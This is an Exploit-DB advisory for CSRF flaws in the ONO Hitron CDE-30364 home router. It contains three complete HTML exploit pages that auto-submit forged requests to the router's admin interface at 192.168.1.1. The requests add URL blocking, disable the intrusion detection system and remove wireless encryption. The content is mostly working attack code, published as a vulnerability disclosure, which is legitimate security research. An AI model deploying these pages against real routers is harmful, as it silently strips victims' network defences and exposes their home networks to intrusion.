Router ONO Hitron CDE-30364 - Cross-Site Request Forgery

EDB-ID:

28279

CVE:


EDB Verified:

Author:

Matias Mingorance Svensson

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2013-09-14

Vulnerable App: 
# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability
# Date: 14-9-2013
# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org
# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
# Tested on: Hitron Technologies CDE-30364
# Version HW: 1A
# Version SW: 3.1.0.8-ONO

-----------------------------------------------------------------------------------------
Introduction:
-----------------------------------------------------------------------------------------
Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web
management interface in order to set and change device parameters.

The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port
80) is prone to CSRF vulnerabilities which allows to change router
parameters and to perform many modifications to the router's parameters.
The default ip adress of this adsl router, used for management purpose, is
192.168.1.1.

-----------------------------------------------------------------------------------------
Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL
blocking(google in this case)
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-2: Enable/Disable Intrusion Detection System
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-3: Disable(None) Wireless Security Mode
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0">
</body>
</html>

-----------------------------------------------------------------------------------------
Many other changes can be performed.


-- 
Un saludo,
Mat�as Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services